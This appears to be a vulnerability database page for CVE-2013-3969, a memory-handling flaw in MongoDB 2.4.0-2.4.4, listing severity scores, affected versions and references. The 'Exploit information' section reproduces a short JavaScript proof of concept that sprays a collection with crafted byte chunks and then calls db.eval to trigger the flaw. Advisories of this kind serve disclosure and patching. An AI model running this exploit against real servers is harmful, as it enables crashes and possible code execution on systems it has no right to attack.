CVE-2013-3969 : Detail

CVE-2013-3969

7.14%V3
Network
2013-10-01
20h00 +00:00
2024-09-16
16h24 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The find prototype in scripting/engine_v8.h in MongoDB 2.4.0 through 2.4.4 allows remote authenticated users to cause a denial of service (uninitialized pointer dereference and server crash) or possibly execute arbitrary code via an invalid RefDB object.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 38669

Publication date : 2013-06-03 22h00 +00:00
Author : SCRT Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/61309/info MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application. MongoDB 2.4.4 is vulnerable; other versions may also be affected. use databaseMapped sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) } db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');

Products Mentioned

Configuraton 0

Mongodb>>Mongodb >> Version 2.4.0

Mongodb>>Mongodb >> Version 2.4.1

Mongodb>>Mongodb >> Version 2.4.2

Mongodb>>Mongodb >> Version 2.4.3

Mongodb>>Mongodb >> Version 2.4.4

References

http://www.openwall.com/lists/oss-security/2013/07/30/10
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/54170
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mongodb.org/about/alerts/
Tags : x_refsource_CONFIRM